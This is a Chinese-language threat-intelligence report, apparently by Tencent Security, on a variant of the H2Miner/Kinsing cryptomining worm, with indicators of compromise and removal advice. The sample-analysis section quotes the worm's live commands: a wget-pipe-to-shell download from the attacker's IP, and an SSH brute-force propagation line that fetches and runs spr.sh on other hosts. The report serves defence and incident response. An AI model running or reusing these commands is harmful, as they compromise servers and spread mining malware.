腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心已检测到数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。
一、概述
腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心已检测到数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。
腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利,横向扫描扩大攻击面并维持与远程服务器(C2)通信,令服务器变成黑客控制的肉鸡。同时,具有卸载云服务器安全软件、删除云服务器镜像的能力,会给企业云服务器安全带来严重影响。
H2Miner挖矿蠕虫利用的高危漏洞包括:
Redis未授权RCE;
Solr dataimport RCE(CVE-2019-0193);
Hadoop Yarn REST API未授权RCE(CVE-2017-15718);
Docker Remote API未授权RCE;
ThinkPHP5 RCE;
Confluence 未授权RCE(CVE-2019-3396);
SaltStack RCE(CVE-2020-11651)
等多个Web应用漏洞。
此次H2Miner变种更新了C2服务器地址,在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息,并利用搜索得到的userlist、hostlist、keylist、sshports进行组合尝试爆破登陆,从而扩大其攻击范围。
腾讯安全系列产品已针对H2Miner挖矿蠕虫病毒应急响应,建议相关企业参考如下清单加以排查:
| 应用场景 | 安全产品 | 解决方案 |
| 威胁情报 | 腾讯T-Sec威胁情报云查服务(SaaS) | 1)H2Miner黑产团伙相关IOCs已入库。各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
| 腾讯T-Sec高级威胁追溯系统 | 1)H2Miner黑产团伙相关信息和情报已支持检索。网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts | |
| 云原生安全防护 | 云防火墙(Cloud Firewall,CFW) | 基于网络流量进行威胁检测与主动拦截,已支持:1)H2Miner关联的IOCs已支持识别检测;2)H2Miner与C2服务器通信协议已支持检测;有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw |
| 腾讯T-Sec 漏洞扫描服务(Cloud Workload Protection,CWP) | 腾讯T-Sec漏洞扫描服务支持自动探测企业网络资产是否存在H2Miner黑产团伙所利用的高危漏洞,并指导修复。更多信息可参考:https://cloud.tencent.com/product/vss | |
| 腾讯T-Sec 主机安全(腾讯云镜,Cloud Workload Protection,CWP) | 1)腾讯云镜已支持查杀H2Miner相关木马程序;2)腾讯云镜已支持以下漏洞检测:Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193) ;Confluence 未授权RCE(CVE-2019-3396)漏洞;ThinkPHP远程代码执行漏洞;SaltStack远程命令执行漏洞(CVE-2020-11651)。腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp | |
| 腾讯T-Sec 安全运营中心 | 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html | |
| 非云企业安全防护 | 腾讯T-Sec高级威胁检测系统(腾讯御界) | 1)已支持通过协议检测H2Miner木马与服务器的网络通信;2)已支持以下漏洞利用的检测:SaltStack远程命令执行漏洞(CVE-2020-11651)Confluence未授权远程代码执行漏洞(CVE-2019-3396)ThinkPHP远程代码执行漏洞Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193)关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta |
| 腾讯T-Sec终端安全管理系统(御点) | 1)可查杀H2Miner团伙入侵释放的木马程序;腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html |
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、样本分析
Docker是一个开源的应用容器引擎,开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 由docker官方提供,是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展。使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375(或2376)。
攻击者利用未受保护的开放Docker API端口进行攻击,并执行恶意命令:
wget -q -O – http[:]//93.189.43.3/d.sh | sh
d.sh执行以下操作:
1. 禁用SELINUX并清除系统日志:echo SELINUX=disabled >/etc/selinux/config;
2. 卸载阿里云骑士和腾讯云镜;
3. 清除竞品挖矿木马;
4. 杀死正在运行的恶意Docker容器并删除它们的映像;
5. 下载恶意程序“kinsing”并运行;
6. 通过crontab定时任务每分钟下载和执行shell脚本;
7. 删除竞品挖矿木马的crontab定时任务。
下载得到的kinsing采用Golang编写,被编译为Linux平台可执行程序,主要有以下功能:
1.下载文件并执行;
2.启动和维持挖矿程序;
3.与C&C服务器通信,接收并执行远程命令;
3.利用masscan对外扫描;
4.针对redis服务进行爆破攻击;
5.下载shell脚本http[:]//93.189.43.3/spre.sh,以进行横向移动。
受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信,其中肉鸡的信息在http头部中标识。
Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi,然后启动连接矿池xmr-eu1.nanopool.org挖矿,配置中使用门罗币钱包为:
46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb
挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。
横向移动
Spre.sh是用于在网络中横向传播H2Miner的shell脚本。为了发现攻击目标并找与其相对应的身份验证的信息,脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。
利用收集到的信息,恶意脚本尝试通过SSH连接到每个主机,使用每个可能的用户和密钥组合进行爆破登陆,以便在网络中的其他主机或容器上下载和运行shell脚本Spr.sh,spr.sh与最初攻击时的d.sh相同。
以下SSH命令用于在网络中传播H2Miner:
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp “sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O – http[:]//93.189.43.3/spr.sh|sh;”
三、手动清除H2Miner建议:
1、 查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;
2、 查找crontab任务中包含“195.3.146.118”的相关项并删除。
IOCs
IP
195.3.146.118
142.44.191.122
185.92.74.42
217.12.221.244
93.189.43.3
185.154.53.140
Md5
| kdevtmpfsi | 8c6681daba966addd295ad89bf5146af |
| kinsing | 52ca5bc47c84a748d2b349871331d36a |
| a.sh | e3af308c4a4130dd77dc5772d801ebab |
| cron.sh | bd405b37e69799492a58a50f5efc2725 |
| d.sh | be17040e1a4eaf7e2df8c0273ff2dfd2 |
| ex.sh | 7f469ccecbf9d0573f0efd456e8e63a7 |
| h2.sh | 1b34c5bb3a06c4439b5da77c49f14cf7 |
| j.sh | 41640173ddb6a207612ee052b48dd8be |
| lf.sh | bac660c7aa23f4fda6c699c75b4b89f1 |
| p.sh | e040303652c05dbf6469c9c3ce68031a |
| pa.sh | 18dc6621299b855793bdeaad8ef5af23 |
| s.sh | 1c489a326a4d37fbf02680bbd6f38b4f |
| spr.sh | 255779cf6134f3ac5133f04868e3956c |
| spre.sh | 639d87d54aa57371cc0bf82409503311 |
| t.sh | ae9017bbeac57bc4de1ac5f59d59c519 |
| tf.sh | 831093a5a825ab096c2fc73a7a52bbf1 |
| al.sh | d06e2a3f52043c3a3c3ecf1f406b8241 |
URL
https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing
https[:]//bitbucket.org/tromdiga1/git/raw/master/for
http[:]//93.189.43.3/kinsing
http[:]//93.189.43.3/kinsing2
http[:]//93.189.43.3/spr.sh
http[:]//93.189.43.3/spre.sh
http[:]//93.189.43.3/a.sh
http[:]//93.189.43.3/cron.sh
http[:]//93.189.43.3/d.sh
http[:]//93.189.43.3/ex.sh
http[:]//93.189.43.3/h2.sh
http[:]//93.189.43.3/j.sh
http[:]//93.189.43.3/lf.sh
http[:]//93.189.43.3/p.sh
http[:]//93.189.43.3/pa.sh
http[:]//93.189.43.3/s.sh
http[:]//93.189.43.3/t.sh
http[:]//93.189.43.3/tf.sh
http[:]//93.189.43.3/al.sh
参考链接:
H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元
[출처 : 텐센트 / 2020.07.30.]
댓글을 남겨주세요
로그인 후 댓글을 작성할 수 있습니다.